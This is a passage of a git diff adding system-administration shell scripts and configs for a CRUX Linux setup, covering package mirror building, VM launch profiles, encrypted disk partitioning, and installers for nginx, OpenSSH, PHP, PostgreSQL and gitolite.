+echo "update system"
+prt-get depinst $(prt-get listinst | xargs prt-get quickdep)
+prt-get sysup
+prt-get update -fr $(revdep)
+
+# Create list of installed packages
+echo "creating list of installed..."
+rm -r /usr/ports/installed
+pkg_installed
+
+### clean distribution files
+mkdir -p /usr/ports/archive/distfiles
+mv /usr/ports/distfiles/* /usr/ports/archive/distfiles
+### clean packages files
+mkdir -p /usr/ports/archive/packages
+mv /usr/ports/packages/* /usr/ports/archive/packages
+### get sources and packages
+cd /usr/ports/installed
+for installed in *; do
+        prt-get path $installed | while read -r line; do
+		cd $line
+		##get source
+	        sudo -u pkgmk -g pkgmk pkgmk -do
+		#make sure package exists
+		current="${installed}#$(prt-get current ${installed}).pkg.tar.gz"
+		echo "checking $current ..."
+		cp /usr/ports/archive/packages/${current} /usr/ports/packages/
+		prt-get update $installed
+        done
+done
+
+# Create repository
+echo "creating repository"
+cd /usr/ports/packages
+pkg-repgen
+
+# Create mirror page
+echo "creating mirror index page"
+portspage --title=${BUILD_TITLE} /usr/ports/installed > /usr/ports/installed/index.html
+
+sed -i "s@usr\/ports\/installed@mirror/installed@g" /usr/ports/installed/index.html
+
+echo "setting permissions /usr/ports"
+chown pkgmk:pkgmk -R /usr/ports
+
+# Remove temporary file
+rm /tmp/mirror
diff --git a/linux/scripts/pkgmk-test.conf b/linux/scripts/pkgmk-test.conf
new file mode 100644
index 0000000..4a04eec
--- /dev/null
+++ b/linux/scripts/pkgmk-test.conf
@@ -0,0 +1,19 @@
+#
+# /etc/pkgmk.conf: pkgmk(8) configuration
+#
+
+source /etc/pkgmk.conf
+
+#PKGMK_SOURCE_MIRRORS=(http://c1.ank/distfiles/)
+PKGMK_SOURCE_DIR="$PWD"
+PKGMK_PACKAGE_DIR="$PWD"
+PKGMK_WORK_DIR="$PWD/work"
+PKGMK_DOWNLOAD="yes"
+PKGMK_UP_TO_DATE="no"
+# PKGMK_IGNORE_FOOTPRINT="no"
+# PKGMK_IGNORE_NEW="no"
+# PKGMK_NO_STRIP="no"
+# PKGMK_DOWNLOAD_PROG="wget"
+# PKGMK_WGET_OPTS=""
+# PKGMK_CURL_OPTS=""
+# PKGMK_COMPRESSION_MODE="gz"
diff --git a/linux/scripts/pkgmk-test.sh b/linux/scripts/pkgmk-test.sh
new file mode 100644
index 0000000..4cfe2c3
--- /dev/null
+++ b/linux/scripts/pkgmk-test.sh
@@ -0,0 +1,5 @@
+#!/bin/bash
+DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+CONF=${DIR}/pkgmk-test.conf
+echo "pkgmk -cf $CONF -d -is $1"
+fakeroot pkgmk -cf $CONF -d -is $1
diff --git a/linux/scripts/portspage.patch b/linux/scripts/portspage.patch
new file mode 100644
index 0000000..94e653a
--- /dev/null
+++ b/linux/scripts/portspage.patch
@@ -0,0 +1,27 @@
+220c220
+< 	print "  <h2>$options{title}</h2>\n";
+---
+> 	print "  <h2><a href=\"https://tribu.semdestino.org/wiki/mirror\">Mirror</a> | <a href=\"https://tribu.semdestino.org/wiki/crux\">Crux</a> | <a href=\"https://tribu.semdestino.org/git/\">Git</a> | <a href=\"https://tribu.semdestino.org/mirror/bugs/\">Build errors</a> | <a href=\"https://tribu.semdestino.org/mirror/distfiles/\">Distfiles</a> | <a href=\"https://tribu.semdestino.org/mirror/releases/archives/$options{title}.tar.gz\">$options{title}.tar.gz</a> | <a href=\"https://tribu.semdestino.org/mirror/archive/\">Archive</a></h2>\n";
+233c233,238
+< 	print "   <tr class=\"header\"><td><b>Port</b></td><td><b>Version</b></td><td><b>Description</b></td>";
+---
+> 	print "   <tr class=\"header\">
+> 	<td><b>Project page</b></td>
+> 	<td><b>Port</b></td>
+> 	<td><b>Package</b></td>
+> 	<td><b>Description</b></td>";
+> 
+244,248c249,255
+< 		print "   <tr class=\"$odd\"><td>";
+< 		$db{$port}{URL} ? print "<a href=\"$db{$port}{URL}\">$port</a>" : print "$port";
+< 		print "</td><td><a href=\"$options{directory}/$port/\">$db{$port}{version}-$db{$port}{release}</a></td><td>";
+< 		print $db{$port}{Description} if $db{$port}{Description};
+< 		print "</td>";
+---
+> 		my $port_collection=`prt-get info $port | grep "Path:" | cut -d ":" -f 2 | xargs basename`;
+> 		print "   <tr class=\"$odd\">";
+> 		$db{$port}{URL} ? print "<td><a href=\"$db{$port}{URL}\">$port</a></td>" : print "<td>$port</td>";
+> 		#print "</td><td><a href=\"$options{directory}/$port/\">$db{$port}{version}-$db{$port}{release}</a></td><td>";
+> 		print "<td><a href=\"https://tribu.semdestino.org/git/$port_collection.git/tree/refs/heads/master\:/$port\">$db{$port}{version}-$db{$port}{release}</a></td>";
+> 		print "<td><a href=\"https://tribu.semdestino.org/mirror/packages/$port%23$db{$port}{version}-$db{$port}{release}.pkg.tar.gz\">$port#$db{$port}{version}-$db{$port}{release}.pkg.tar.gz</a></td>";
+> 		print "<td>$db{$port}{Description}</td>" if $db{$port}{Description};
diff --git a/linux/scripts/replace.sh b/linux/scripts/replace.sh
new file mode 100755
index 0000000..8d5d8d9
--- /dev/null
+++ b/linux/scripts/replace.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+# find and replace string on files
+folder=$1
+oldstring=$2
+newstring=$3
+
+#grep -rl $oldstring $folder | xargs sed -i s@$oldstring@$newstring@g
+grep -rl "$oldstring" $folder | xargs sed -i "s@$oldstring@$newstring@g"
diff --git a/linux/scripts/restore-ports.sh b/linux/scripts/restore-ports.sh
new file mode 100644
index 0000000..cf886ab
--- /dev/null
+++ b/linux/scripts/restore-ports.sh
@@ -0,0 +1,53 @@
+#!/bin/bash
+
+BUILD_NAME=R1D9
+BUILD_VERSION=3.4.1
+WORK_DIR=/usr/ports/work/${BUILD_NAME}-${BUILD_VERSION}
+
+prepare_archive() {
+    mkdir -p ${WORK_DIR}
+    wget --directory-prefix=${WORK_DIR} https://tribu.semdestino.org/mirror/releases/archives/${BUILD_NAME}-${BUILD_VERSION}.tar.gz
+    echo "extracting ${WORK_DIR}/${BUILD_NAME}-${BUILD_VERSION}.tar.gz..."
+    tar -C ${WORK_DIR} -xf ${WORK_DIR}/${BUILD_NAME}-${BUILD_VERSION}.tar.gz
+    rm ${WORK_DIR}/${BUILD_NAME}-${BUILD_VERSION}.tar.gz
+}
+
+extract_archives() {
+    while read COLL_VERSION; do
+        COLL_NAME=$(echo $COLL_VERSION | cut -d "-" -f 1)
+        COLL_RELEASE=$(echo $COLL_VERSION | cut -d "-" -f 2)
+        echo "extracting ${COLL_VERSION}.tar to /usr/ports/packages"
+        tar -C /usr/ports/packages -xf ${WORK_DIR}/${COLL_VERSION}.tar
+        rm ${WORK_DIR}/${COLL_VERSION}.tar
+    done < ${WORK_DIR}/metadata/ports-releases
+}
+
+update_system() {
+    mkdir -p ${WORK_DIR}/etc/ports
+    tar -C ${WORK_DIR}/etc/ports -xf ${WORK_DIR}/etc_ports.tar.gz
+    cp ${WORK_DIR}/etc/ports/*.git /etc/ports/
+
+    while read COLL_VERSION; do
+        COLL_NAME=$(echo $COLL_VERSION | cut -d "-" -f 1)
+        ports -u $COLL_NAME
+    done < ${WORK_DIR}/metadata/ports-releases
+
+    # first update with prt-get
+    prt-get sysup
+    prt-get --pre-install --post-install update $(prt-get listinst)
+    prt-get depinst $(prt-get printf "%p %n\n" | grep "/usr/ports/core" | cut -d " " -f 2)
+    prt-get update $(revdep)
+
+    rejmerge
+}
+
+install_distro() {
+    while read PACKAGE; do
+        prt-get depinst $(echo $PACKAGE | cut -d "#" -f 1);
+    done < ${WORK_DIR}/all-installed.pkg
+}
+
+prepare_archive
+extract_archives
+update_system
+install_distro
diff --git a/linux/scripts/runvm/c12-dvd b/linux/scripts/runvm/c12-dvd
new file mode 100644
index 0000000..9cbf201
--- /dev/null
+++ b/linux/scripts/runvm/c12-dvd
@@ -0,0 +1,15 @@
+export QEMU_AUDIO_DRV=alsa
+
+memory=1024
+
+boot=c
+
+iso=iso/devuan_jessie_1.0.0_amd64_CD.iso
+
+image=img/c12-dvd.qcow2
+
+tap="tap2"
+
+mac="54:60:be:ef:5c:72"
+
+other="-soundhw hda -vga std -display sdl -usb -device usb-ehci  -device usb-host,vendorid=0x13d3,productid=0x5652"
diff --git a/linux/scripts/runvm/profile/crux b/linux/scripts/runvm/profile/crux
new file mode 100644
index 0000000..672b80d
--- /dev/null
+++ b/linux/scripts/runvm/profile/crux
@@ -0,0 +1,7 @@
+mac="54:60:be:ef:5c:64"
+memory=1024
+boot=$2
+tap="tap4"
+iso=iso/crux-3.4.iso
+image=img/c14.qcow2
+other="-vga std -display sdl"
diff --git a/linux/scripts/runvm/runvm.sh b/linux/scripts/runvm/runvm.sh
new file mode 100644
index 0000000..21cd097
--- /dev/null
+++ b/linux/scripts/runvm/runvm.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+
+function rmac_addr (){
+printf '54:60:BE:EF:%02X:%02X\n' $((RANDOM%256)) $((RANDOM%256))
+}
+
+source profile/$1
+
+#mac=$(rmac_addr)
+#memory=1024
+#boot=d
+#tap="tap1"
+#iso=iso/crux-3.4.iso
+#image=img/crux-standard.qcow2
+#other="-soundhw hda -vga std -display sdl"
+
+qemu-system-x86_64 \
+    -enable-kvm \
+    -m ${memory} \
+    -boot ${boot} \
+    -cdrom ${iso} \
+    -hda ${image} \
+    -device e1000,netdev=t0,mac=${mac} \
+    -netdev tap,id=t0,ifname=${tap},script=no,downscript=no \
+    ${other} \
+    &
diff --git a/linux/scripts/setup-core.sh b/linux/scripts/setup-core.sh
new file mode 100644
index 0000000..45bce87
--- /dev/null
+++ b/linux/scripts/setup-core.sh
@@ -0,0 +1,154 @@
+#!/bin/bash
+
+# Absolute path to this script,
+# e.g. /home/user/doc/core/scripts/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in,
+# e.g. /home/user/doc/core/scripts
+SCRIPTPATH=$(dirname "$SCRIPT")
+# Absolute path to doc section,
+# e.g /home/user/doc/core
+DIR_DATA=$(dirname "$SCRIPTPATH");
+
+CHROOT="/mnt"
+DATA_CNF="${DIR_DATA}/conf"
+ADMIN_USER="machine-admin"
+
+ConfirmOrExit()
+{
+    while true
+    do
+	echo -n "Please confirm (y or n) :"
+	read CONFIRM
+	case $CONFIRM in
+	    y|Y|YES|yes|Yes) break ;;
+	    n|N|no|NO|No)
+		echo "Aborting - you entered $CONFIRM"
+		exit
+		;;
+	    *) echo "Please enter only y or n"
+	esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+setup_core() {
+
+    echo "1.1. Copying configuration data;\n"
+    if [ -f "${DATA_CNF}/etc.tar.gz" ]; then
+	echo "1.1. Extracting configuration data;\n"
+	tar --xattrs -xpvf $DATA_CNF/etc.tar.gz --directory=$CHROOT/etc
+	tar --xattrs -xpvf $DATA_CNF/usr_etc.tar.gz --directory=$CHROOT/usr/etc
+    else
+	echo "1.1.7. dns resolver, copy resolv.conf;\n"
+	cp /etc/resolv.conf $CHROOT/etc
+
+	echo "1.1.9. Install Skeletons\n"
+	cp -r $DATA_CNF/skel $CHROOT/etc/
+
+	cp $DATA_CNF/sudoers $CHROOT/etc/
+
+	echo "1.2.1. Set hostname and hosts;"
+	cp $DATA_CNF/hosts $CHROOT/etc/
+
+	echo "1.2.5. File system table;"
+	cp $DATA_CNF/fstab $CHROOT/etc/
+	chroot $CHROOT /bin/bash -c "mount >> /etc/fstab"
+
+	echo "1.2.6. Initialization Scripts;"
+	cp $DATA_CNF/rc.d/* $CHROOT/etc/rc.d/
+	cp $DATA_CNF/rc.conf $CHROOT/etc/
+
+	echo "1.3 Install Ports;"
+	rm -fr $CHROOT/etc/ports
+	cp -r $DATA_CNF/ports $CHROOT/etc/ports
+	cp $DATA_CNF/ports.conf $CHROOT/etc/ports.conf
+
+	echo "1.3.3 Configure pkgmk;"
+	cp $DATA_CNF/pkgmk.conf $CHROOT/etc/pkgmk.conf
+	cp $DATA_CNF/pkgmk.conf.harden $CHROOT/etc/pkgmk.conf.harden
+
+	echo "1.3.4 Configure prt-get;"
+	cp $DATA_CNF/prt-get.conf $CHROOT/etc/
+
+    fi
+
+    echo "1.2.2. Set timezone;"
+    chroot $CHROOT /bin/bash -c tzselect
+
+    echo "1.2.3. Set locale;"
+    chroot $CHROOT /bin/bash -c "localedef -i en_US -f UTF-8 en_US.UTF-8"
+}
+
+setup_users(){
+    echo "1.2.4.2. Create Administrator $ADMIN_USER;"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "useradd -U -m -k /etc/skel -s /bin/bash $ADMIN_USER"
+
+    echo "1.2.4.3. Add Administrator $ADMIN_USER to wheel group;"
+    chroot $CHROOT /bin/bash -c "usermod -a -G wheel $ADMIN_USER"
+    echo "1.2.4.3. Uncomment to allow members of group wheel to execute any command\n
+    #    %wheel ALL=(ALL) ALL"
+
+    echo "1.3.1. Ports Layout;"
+
+    chroot --userspec=pkgmk:pkgmk $CHROOT /bin/bash -c "mkdir /usr/ports/{work,distfiles,packages,work,pkgbuild}"
+
+    echo "1.3.2. Build as unprivileged user;"
+
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "useradd -U -M -d /usr/ports -s /bin/false pkgmk"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "usermod -a -G pkgmk $ADMIN_USER"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "chown pkgmk /usr/ports/{distfiles,packages,work,pkgbuild}"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "chown pkgmk:pkgmk /usr/ports/pkgbuild"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "chmod g+w /usr/ports/pkgbuild"
+
+    PKGMK_WRK="pkgmk   /usr/ports/work tmpfs size=30G,gid=$(id -g pkgmk),uid=$(id -u pkgmk),defaults,mode=0750 0    0 >> /etc/fstab"
+
+    chroot $CHROOT /usr/bin/env -i \
+	HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+	PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+	/bin/bash -c "echo ${PKGMK_WRK} >> /etc/fstab"
+}
+
+setup_config(){
+    vim $CHROOT/etc/rc.conf
+    vim $CHROOT/etc/hosts
+    vim $CHROOT/etc/resolv.conf
+    vim $CHROOT/etc/fstab
+
+    vim $CHROOT/etc/pkgmk.conf
+    vim $CHROOT/etc/prt-get.conf
+}
+
+echo "ADMIN_USER=${ADMIN_USER}";
+echo "CHROOT=${CHROOT}";
+echo "DATA_CNF=${DATA_CNF}";
+
+ConfirmOrExit
+
+setup_core
+setup_users
+setup_config
diff --git a/linux/scripts/setup-gitolite.sh b/linux/scripts/setup-gitolite.sh
new file mode 100644
index 0000000..c42db14
--- /dev/null
+++ b/linux/scripts/setup-gitolite.sh
@@ -0,0 +1,43 @@
+#!/bin/sh
+
+# First we define the function
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+
+# Absolute path to this script, e.g. /home/user/bin/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in, thus /home/user/bin
+SCRIPTPATH=$(dirname "$SCRIPT")
+
+DIR=$(dirname "$SCRIPTPATH");
+DIR_CONF=$DIR"/conf"
+
+echo "SCRIPT=$SCRIPT";
+echo "SCRIPTPATH=$SCRIPTPATH";
+echo "DIR=$DIR";
+echo "DIR_CONF=$DIR_CONF";
+ConfirmOrExit
+
+    prt-get depinst gitolite
+
+    mkdir -p /srv/gitolite
+    useradd -U -d /srv/gitolite gitolite
+    chown gitolite:gitolite /srv/gitolite
+
+exit 0;
diff --git a/linux/scripts/setup-iso.sh b/linux/scripts/setup-iso.sh
new file mode 100644
index 0000000..19ac21f
--- /dev/null
+++ b/linux/scripts/setup-iso.sh
@@ -0,0 +1,144 @@
+#!/bin/sh
+
+# location of iso and md5 file
+ISO_DIR="/usr/ports/iso"
+MOUNT_POINT="/mnt/media"
+
+ISO_FILE="${ISO_DIR}/crux-3.6.iso"
+MD5_FILE="${ISO_DIR}/crux-3.6.md5"
+
+# iso and md5 remote location
+#ISO_URL="https://serverop.de/crux/crux-3.6/iso/crux-3.6.iso"
+ISO_URL="https://ftp.spline.inf.fu-berlin.de/pub/crux/crux-3.6/iso/crux-3.6.iso"
+MD5_URL="https://serverop.de/crux/crux-3.6/iso/crux-3.6.md5"
+
+# First we define the function
+ConfirmOrExit () {
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+download_iso() {
+
+    mkdir -p ${ISO_DIR}
+
+    if [ -f $ISO_FILE ];
+    then
+        echo "File $ISO_FILE exists."
+    else
+        echo "File $ISO_FILE does not exist."
+        cd $ISO_DIR && { curl -k -O $ISO_URL ; cd -; }
+    fi
+
+    if [ -f $MD5_FILE ];
+    then
+        echo "File ${MD5_FILE} exists."
+    else
+        echo "File ${MD5_FILE} does not exist."
+        cd ${ISO_DIR} && { curl -k -O ${MD5_URL} ; cd -; }
+    fi
+
+}
+
+check_iso() {
+    if  cd ${ISO_DIR} && md5sum -c ${MD5_FILE} ;
+    then
+        echo "Valid iso md5sum"
+    else
+        echo "Invalid iso md5sum"
+    fi
+}
+
+mount_iso() {
+
+    if [ ! -f $ISO_FILE ];
+    then
+        echo "File $ISO_FILE does not exist."
+        exit 0
+    fi
+
+    modprobe isofs
+    modprobe loop
+    mount -o loop $ISO_FILE $MOUNT_POINT
+}
+
+print_data() {
+    echo "1.1.1 Paths to iso and md5 files:"
+    echo "iso dir: ${ISO_DIR}"
+    echo "iso file: ${ISO_FILE}"
+    echo "md5 file: ${MD5_FILE}"
+    echo "iso url: ${ISO_URL}"
+    echo "md5 url: ${MD5_URL}"
+    echo "mount point: ${MOUNT_POINT}"
+}
+
+print_help() {
+	echo "usage: setup-iso [options]"
+	echo "options:"
+	echo "  -r,   --root                default dir is /usr/ports/iso"
+	echo "  -d,   --download            download iso"
+	echo "  -c,   --check               check iso md5sum"
+	echo "  -m,   --mount               mount iso on /media "
+	echo "  -h,   --help                print help and exit"
+}
+
+while [ "$1" ]; do
+            case $1 in
+                    -r|--root)
+                        ISO_DIR=$2
+
+                        ISO_FILE="${ISO_DIR}/crux-3.6.iso"
+                        MD5_FILE="${ISO_DIR}/crux-3.6.md5"
+
+                        shift ;;
+                    -d|--download)
+                        echo "Download iso:"
+                        echo "_____________________"
+                        print_data
+                        ConfirmOrExit
+                        download_iso
+                        exit 0 ;;
+                    -c|--check)
+                        echo "Check iso md5sum:"
+                        echo "_____________________"
+                        print_data
+                        ConfirmOrExit
+                        check_iso
+                        exit 0 ;;
+                   -m|--mount)
+                        echo "Check iso md5sum:"
+                        echo "_____________________"
+                        if [ ! -z "$2" ];
+                        then
+                            MOUNT_POINT=$2
+                        fi
+                        print_data
+                        ConfirmOrExit
+                        mount_iso
+                        exit 0 ;;
+                    -h|--help)
+                        print_help
+                        exit 0 ;;
+                    *)
+                        echo "setup-iso: invalid option $1"
+                        print_help
+                        exit 1 ;;
+            esac
+            shift
+done
+
+echo "setup-iso: no option provided"
+print_help
+exit 1
diff --git a/linux/scripts/setup-nginx.sh b/linux/scripts/setup-nginx.sh
new file mode 100644
index 0000000..11065d2
--- /dev/null
+++ b/linux/scripts/setup-nginx.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+#. `dirname $0`/config-install.sh
+#
+#prt-get depinst nginx
+#
+#cp -R $CONF_DIR/etc/nginx/* /etc/nginx/
+#
+#mkdir /srv/www
+#chown www:www /srv/www
+#
+#usermod -a -g www nginx
+#usermod -m -d /srv/www nginx
+
+openssl genrsa -des3 -out /etc/ssl/keys/nginx.key 2048
+openssl req -new -key /etc/ssl/keys/nginx.key -out /etc/ssl/certs/nginx.csr
+openssl x509 -req -days 365 \
+            -in /etc/ssl/certs/nginx.csr \
+            -signkey /etc/ssl/keys/nginx.key \
+            -out /etc/ssl/certs/nginx.crt
+
+cp /etc/ssl/keys/nginx.key /etc/ssl/keys/nginx.key.pass
+openssl rsa -in /etc/ssl/keys/nginx.key.pass -out /etc/ssl/keys/nginx.key
+
diff --git a/linux/scripts/setup-openssh.sh b/linux/scripts/setup-openssh.sh
new file mode 100644
index 0000000..14afe8b
--- /dev/null
+++ b/linux/scripts/setup-openssh.sh
@@ -0,0 +1,43 @@
+#!/bin/sh
+
+# First we define the function
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+
+# Absolute path to this script, e.g. /home/user/bin/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in, thus /home/user/bin
+SCRIPTPATH=$(dirname "$SCRIPT")
+
+DIR=$(dirname "$SCRIPTPATH");
+DIR_CONF=$DIR"/conf"
+
+echo "SCRIPT=$SCRIPT";
+echo "SCRIPTPATH=$SCRIPTPATH";
+echo "DIR=$DIR";
+echo "DIR_CONF=$DIR_CONF";
+ConfirmOrExit
+
+
+    #installer overwrite system init script
+    cp -R $DIR_CONF/etc/ssh/sshd_config /etc/ssh/sshd_config
+
+    sh /etc/rc.d/sshd start
+
+exit 0;
diff --git a/linux/scripts/setup-php.sh b/linux/scripts/setup-php.sh
new file mode 100644
index 0000000..4c28173
--- /dev/null
+++ b/linux/scripts/setup-php.sh
@@ -0,0 +1,7 @@
+#!/bin/sh
+
+. `dirname $0`/config-install.sh
+
+prt-get depinst php php-fpm php-gd php-pdo-pgsql php-postgresql
+
+cp /etc/php/php.ini-development /etc/php/php.ini
diff --git a/linux/scripts/setup-postgresql.sh b/linux/scripts/setup-postgresql.sh
new file mode 100644
index 0000000..4e1ee3a
--- /dev/null
+++ b/linux/scripts/setup-postgresql.sh
@@ -0,0 +1,87 @@
+#!/bin/sh
+
+# First we define the function
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+
+# Absolute path to this script, e.g. /home/user/bin/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in, thus /home/user/bin
+SCRIPTPATH=$(dirname "$SCRIPT")
+
+DIR=$(dirname "$SCRIPTPATH");
+DIR_CONF=$DIR"/conf"
+
+echo "SCRIPT=$SCRIPT";
+echo "SCRIPTPATH=$SCRIPTPATH";
+echo "DIR=$DIR";
+echo "DIR_CONF=$DIR_CONF";
+ConfirmOrExit
+
+IS_INSTALL=$(prt-get isinst postgresql);
+echo $IS_INSTALL;
+if [ "$IS_INSTALL" = "package postgresql is installed" ]
+then
+    echo "updating postgresql"
+    OLD_VERSION=$(prt-get current postgresql);
+    echo $OLD_VERSION;
+
+    sudo -u postgres pg_dumpall > /srv/pgsql/dump-$OLD_VERSION.sql
+
+    sh /etc/rc.d/postgresql stop
+
+    #extra backup, in case ...
+    tar --xattrs -zcpf /srv/pgsql/data-$OLD_VERSION.tar.gz \
+                    --directory=/srv/pgsql/data .
+
+    rm -R /srv/pgsql/data
+
+    prt-get update postgresql
+
+    NEW_VERSION=$(prt-get current postgresql);
+    echo $NEW_VERSION;
+
+    sudo -u postgres initdb -D /srv/pgsql/data
+
+    rejmerge
+    #installer overwrite system init script
+    cp -R $DIR_CONF/etc/rc.d/postgresql /etc/rc.d/
+
+    sh /etc/rc.d/postgresql start
+    sleep 5
+
+    sudo -u postgres psql -d postgres -f /srv/pgsql/dump-$OLD_VERSION.sql
+
+else
+    echo "install postgresql and dependencies"
+    prt-get depinst postgresql
+
+    cp -R $DIR_CONF/etc/rc.d/postgresql /etc/rc.d/
+
+    mkdir /srv/pgsql/
+    touch /var/log/postgresql
+    chown postgres:postgres /srv/pgsql /var/log/postgresql
+
+    sudo -u postgres initdb -D /srv/pgsql/data
+
+    cp $DIR_CONF/srv/pgsql/data/pg_hba.conf /srv/pgsql/data/
+    chown postgres:postgres /srv/pgsql/data/pg_hba.conf
+fi
+
+exit 0;
diff --git a/linux/scripts/setup-target.sh b/linux/scripts/setup-target.sh
new file mode 100755
index 0000000..69b8640
--- /dev/null
+++ b/linux/scripts/setup-target.sh
@@ -0,0 +1,224 @@
+#!/bin/sh
+
+DEV=/dev/sda
+VG=vg_system
+
+SETUP_TARGET="print"
+CHROOT="/mnt"
+
+# Absolute path to this script, e.g. /home/user/bin/foo.sh
+SCRIPT=$(readlink -f "$0")
+# Absolute path this script is in, thus /home/user/bin
+SCRIPTPATH=$(dirname "$SCRIPT")
+
+DIR=$(dirname "$SCRIPTPATH");
+DIR_LOCAL="$(dirname $(dirname ${DIR}))/local";
+
+##read BLK_EFI
+BLK_EFI="${DEV}2"
+##read BLK_BOOT
+BLK_BOOT="${DEV}3"
+##read BLK_ROOT
+BLK_CRYPT="${DEV}4"
+BLK_ROOT="/dev/$VG/lv_root"
+##read BLK_VAR
+BLK_VAR="/dev/${VG}/lv_var"
+##read BLK_USR
+#BLK_USR="${DEV}6"
+##read BLK_SWP
+BLK_SWP="/dev/${VG}/lv_swap"
+##read BLK_HOME
+BLK_HOME="/dev/${VG}/lv_home"
+
+
+# First we define the function
+ConfirmOrExit ()
+{
+    while true
+    do
+        echo -n "Please confirm (y or n) :"
+        read CONFIRM
+        case $CONFIRM in
+            y|Y|YES|yes|Yes) break ;;
+            n|N|no|NO|No)
+                echo "Aborting - you entered $CONFIRM"
+                exit
+                ;;
+            *) echo "Please enter only y or n"
+        esac
+    done
+    echo "You entered $CONFIRM. Continuing ..."
+}
+
+
+partition_target () {
+
+    parted --script $DEV \
+        mklabel gpt \
+        unit mib \
+        mkpart primary 1 3 \
+        name 1 grub \
+        set 1 bios_grub on \
+        mkpart ESP fat32 3 125 \
+        name 2 efi \
+        set 2 boot on \
+        mkpart primary ext4 125 1128 \
+        name 3 boot \
+        mkpart primary 1128 100% \
+        set 4 lvm on
+
+    modprobe dm-crypt
+    cryptsetup luksFormat ${BLK_CRYPT}
+    cryptsetup luksOpen ${BLK_CRYPT} cryptlvm
+
+    pvcreate /dev/mapper/cryptlvm
+    vgcreate ${VG} /dev/mapper/cryptlvm
+
+    lvcreate -L 20G -n lv_root ${VG}
+    lvcreate -L 4G -n lv_var ${VG}
+    lvcreate -L 8G -n lv_swap ${VG}
+    lvcreate -L 120G -n lv_home ${VG}
+
+}
+
+mount_target () {
+    echo "1.1.2 Creating File System on $BLK_EFI with fat32:"
+    mkfs.fat -F 32 $BLK_EFI
+    echo "1.1.2 Creating File System on $BLK_BOOT with ext4:"
+    mkfs.ext4 $BLK_BOOT
+    echo "1.1.2 Creating File System on $BLK_ROOT with ext4:"
+    mkfs.ext4 $BLK_ROOT
+    echo "1.1.2 Creating File System on $BLK_VAR with ext4:"
+    mkfs.ext4 $BLK_VAR
+    #echo "1.1.2 Creating File System on $BLK_USR with ext4:"
+    #mkfs.ext4 $BLK_USR
+    echo "1.1.2 Creating Swap File System on $BLK_SWP:"
+    mkswap $BLK_SWP
+    echo "1.1.2 Creating File System on $BLK_HOME with ext4:"
+    mkfs.ext4 $BLK_HOME
+
+    echo "1.1.3 mount point to chroot (/mnt):\n"
+    mount $BLK_ROOT $CHROOT
+
+    mkdir -p $CHROOT/boot
+    mount $BLK_BOOT $CHROOT/boot
+
+    mkdir -p $CHROOT/boot/efi
+    mount $BLK_EFI $CHROOT/boot/efi
+
+    mkdir -p $CHROOT/var
+    mount $BLK_VAR $CHROOT/var
+
+    #mkdir -p $CHROOT/usr
+    #mount $BLK_USR $CHROOT/usr
+
+    mkdir -p $CHROOT/home
+    mount $BLK_HOME $CHROOT/home
+
+    mkdir -p $CHROOT/var/lib/pkg
+    mkdir -p $CHROOT/usr/ports
+
+    mkdir -p $CHROOT/media
+
+    mkdir -p $CHROOT/dev
+    mkdir -p $CHROOT/tmp
+    mkdir -p $CHROOT/proc
+    mkdir -p $CHROOT/sys
+
+}
+
+directory_target () {
+
+    mkdir -p $CHROOT/home
+    mkdir -p $CHROOT/boot/efi
+    mkdir -p $CHROOT/var/lib/pkg
